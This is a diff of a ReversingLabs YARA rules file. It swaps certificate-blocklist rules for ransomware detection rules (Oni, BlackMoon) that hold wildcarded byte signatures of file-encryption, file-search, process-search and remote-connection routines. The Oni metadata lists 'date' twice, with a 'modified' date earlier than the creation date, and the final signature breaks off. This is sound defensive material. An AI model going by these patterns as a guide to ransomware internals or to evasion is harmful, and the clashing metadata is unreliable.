+            ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$remote_connection_3 = {
+            E8 ?? ?? ?? ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? ??
+            ?? ?? DD 5D ?? 9B FF 75 ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ??
+            8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF
+            75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 4D
+            ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B
+            45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_1 = {
+            E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ??
+            8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8
+            ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ??
+            8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? 83 7B ?? ?? 0F 84 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B
+            03 E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 03 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF 86 ?? ??
+            ?? ?? B2 ?? 8B 86 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 03 E8 ?? ?? ?? ?? FF 75 ??
+            68 ?? ?? ?? ?? 8B 43 ?? C1 E8 ?? 33 D2 52 50 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 86 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 03 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_2 = {
+            E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? 8B 12 8B 92 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 8B 55 ?? E8 ?? ?? ?? ?? 3D ??
+            ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ??
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 8B 40
+            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
+            FF 30 64 89 20 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00
+            8B 90 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33
+            C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ??
+            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? 8B 00 8B 90 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8
+            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45
+            ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C3 E9 ?? ?? ?? ?? EB ?? 8B E5 5D C3
+        }
+		$find_files = {
+            E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ??
+            84 C0 0F 85 ?? ?? ?? ?? 33 C0 89 43 ?? 8B 43 ?? E8 ?? ?? ?? ?? 8B F0 85 F6 7C ?? 46
+            33 FF 8B 43 ?? C7 04 B8 ?? ?? ?? ?? 47 4E 75 ?? 8B 43 ?? 8B 40 ?? E8 ?? ?? ?? ?? 8B
+            F0 85 F6 7C ?? 46 33 FF 8B 43 ?? 8B 40 ?? 8B 14 B8 8D 8D ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 43 ?? 8B 53 ?? 89 14 B8 47 4E 75
+            ?? 8B 73 ?? 4E 85 F6 7C ?? 46 33 FF 80 7B ?? ?? 0F 85 ?? ?? ?? ?? 8D 04 BF 8B 53 ??
+            8D 04 C2 89 43 ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8B 45 ?? 8B 10 8B 45 ?? E8 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B
+            45 ?? 33 D2 E8 ?? ?? ?? ?? 47 4E 75 ?? 8B 43 ?? 8B 40 ?? 80 78 ?? ?? 0F 84 ?? ?? ??
+            ?? 80 7B ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? BA ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ??
+            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3
+            E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
+            ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DTOPTOOLZ Co.,Ltd." and pe.signatures [ i ] . serial == "47:d5:d5:37:2b:cb:15:62:b4:c9:f4:c2:bd:f1:35:87" and 1400803199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $find_files and $encrypt_files_1 and $encrypt_files_2 and $remote_connection_1 and $remote_connection_2 and $remote_connection_3
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3Ac10E68F1Ce519E84Ddcd28B11Fa542 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_ONI : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Sakula malware."
+		description = "Yara rule that detects Oni ransomware."
 		author = "ReversingLabs"
-		id = "9cc0e518-84c8-5b23-b8cb-e0e0fe7849bd"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9190aee2-1119-546e-82ca-a7aba44a9d7f"
+		date = "2025-06-15"
+		date = "2025-06-15"
+		modified = "2020-12-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2104-L2120"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "dac3b6b7609ec1e82afe4f9c6c14e2d32b6f5d8d49c59d6c605f2a94d71bc107"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Oni.yara#L1-L82"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "685abf5a5edba5bae19faaf6521ce617370cdab1404fe84d846e82a60182dfff"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "U-Tech IT service" and pe.signatures [ i ] . serial == "3a:c1:0e:68:f1:ce:51:9e:84:dd:cd:28:b1:1f:a5:42" and 1420156799 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_31062E483E0106B18C982F0053185C36 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing Sakula malware."
-		author = "ReversingLabs"
-		id = "84bce7c1-efba-5a76-8865-dcfcc8e50d41"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2122-L2138"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e45fc5b4d1b9f5cd35c56aad381e26e30675a9d99747cd318f3c77ea2af0e14a"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
+            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
+            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 83 EC ?? 8B D4 C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02
+            ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 71 ?? 90 8A 01 41 84
+            C0 75 ?? 2B CE 51 8D 85 ?? ?? ?? ?? 8B CA 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            84 C0 74 ?? 83 EC ?? 8D 45 ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ??
+            ?? ?? 50 C6 01 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ??
+            ?? ?? C7 41 ?? ?? ?? ?? ?? 50 C6 01 ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75
+            ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72
+            ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9
+            ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 CD 5B E8
+            ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 8B 3D ?? ?? ?? ?? 8D 45 ?? 68
+            ?? ?? ?? ?? 6A ?? 33 F6 89 55 ?? 56 56 50 89 4D ?? 89 75 ?? FF D7 85 C0 75 ?? 68 ??
+            ?? ?? ?? 6A ?? 50 50 8D 45 ?? 50 FF D7 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 53 8D 45 ??
+            89 75 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85
+            DB 74 ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? 53 57 FF 15 ?? ?? ?? ?? 53 6A ?? FF 15 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? 8B F0 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ??
+            8B 4D ?? 85 C9 74 ?? 8B 45 ?? 89 01 53 FF 15 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ??
+            5B 8B 4D ?? 8B C6 5F 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$search_processes = {
+            6A ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 44 24 ?? ?? 8D 84 24 ?? ?? ?? ?? FF 74 24 ?? C7 05 ??
+            ?? ?? ?? ?? ?? ?? ?? 50 8D 44 24 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 05 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 83 EE ?? 4F 83 7E
+            ?? ?? 72 ?? 8B 1E 8B CE 56 E8 ?? ?? ?? ?? 8B 46 ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C3 ??
+            75 ?? 8B 43 ?? 3B C3 73 ?? 2B D8 83 FB ?? 72 ?? 83 FB ?? 77 ?? 8B D8 53 E8 ?? ?? ??
+            ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 06 EB ??
+            8B C6 8B CE C6 00 ?? E8 ?? ?? ?? ?? 85 FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 5F 5E 5B 8B E5 5D C3 E8 ?? ?? ?? ?? CC CC CC CC CC B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MICRO DIGITAL INC." and pe.signatures [ i ] . serial == "31:06:2e:48:3e:01:06:b1:8c:98:2f:00:53:18:5c:36" and 1332287999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_processes ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_20D0Ee42Fc901E6B3A8Fefe8C1E6087A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Blackmoon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Sakula malware."
+		description = "Yara rule that detects BlackMoon ransomware."
 		author = "ReversingLabs"
-		id = "ba37919a-584b-5ff7-b4d5-5b711cc87b1f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "95ebb6c4-b0c9-5f9a-8424-a2f4d33953eb"
+		date = "2020-11-11"
+		modified = "2020-11-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2140-L2156"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2225302de1e8fe9f2ad064e19b2b1d9faf90c7cafbebff6ddd0921bf57c5f9e6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.BlackMoon.yara#L1-L70"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "428409096a8637978bf2a1efb3238e4ba87715a909693b0cd26c0f689d567a09"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BlackMoon"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SJ SYSTEM" and pe.signatures [ i ] . serial == "20:d0:ee:42:fc:90:1e:6b:3a:8f:ef:e8:c1:e6:08:7a" and 1391299199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_127251B32B9A50Bd : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing OSX DokSpy backdoor."
-		author = "ReversingLabs"
-		id = "3581085c-a6e7-571f-8253-f8d9e90e78fc"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2158-L2174"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8552ce9e9ab8d6b1025ab3c6e7b2485ef855236114c426475fde0b5f2e231ec9"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            81 EC ?? ?? ?? ?? 53 8B 9C 24 ?? ?? ?? ?? 55 56 8B 33 57 8B BC 24 ?? ?? ?? ?? 33 ED
+            85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 76 ?? 85 F6 74 ?? 83 FE ?? 74 ?? 56 FF
+            15 ?? ?? ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 89 33 74 ?? 8B 84
+            24 ?? ?? ?? ?? 85 C0 74 ?? 8B 4C 24 ?? 83 E1 ?? 80 F9 ?? 74 ?? EB ?? 8B 94 24 ?? ??
+            ?? ?? 8B 44 24 ?? 85 C2 74 ?? BD ?? ?? ?? ?? 85 F6 74 ?? 83 FE ?? 74 ?? 85 ED 75 ??
+            8B 84 24 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 C0 8D 44 24 ?? 50 56 74 ?? FF D7 85 C0 74
+            ?? 8B 4C 24 ?? 83 E1 ?? 80 F9 ?? 75 ?? 8D 54 24 ?? 52 56 FF D7 85 C0 75 ?? 5F 5E 5D
+            33 C0 5B 81 C4 ?? ?? ?? ?? C3 FF D7 85 C0 74 ?? 8B 9C 24 ?? ?? ?? ?? 85 5C 24 ?? 75
+            ?? 8D 4C 24 ?? 51 56 FF D7 85 C0 75 ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 8D 54 24 ??
+            52 E8 ?? ?? ?? ?? 40 50 E8 ?? ?? ?? ?? 8B D0 8D 7C 24 ?? 83 C9 ?? 33 C0 83 C4 ?? F2
+            AE F7 D1 2B F9 8B C1 8B F7 8B FA C1 E9 ?? F3 A5 8B C8 8B C2 83 E1 ?? F3 A4 5F 5E 5D
+            5B 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ??
+            B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? DB
+            45 ?? DD 5D ?? DD 45 ?? DB 45 ?? DD 5D ?? DC 65 ?? DD 5D ?? DD 45 ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B
+            5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D
+            ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
+        }
+		$encrypt_files_p2 = {
+            83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89
+            45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
+            8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ??
+            ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A
+            ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ??
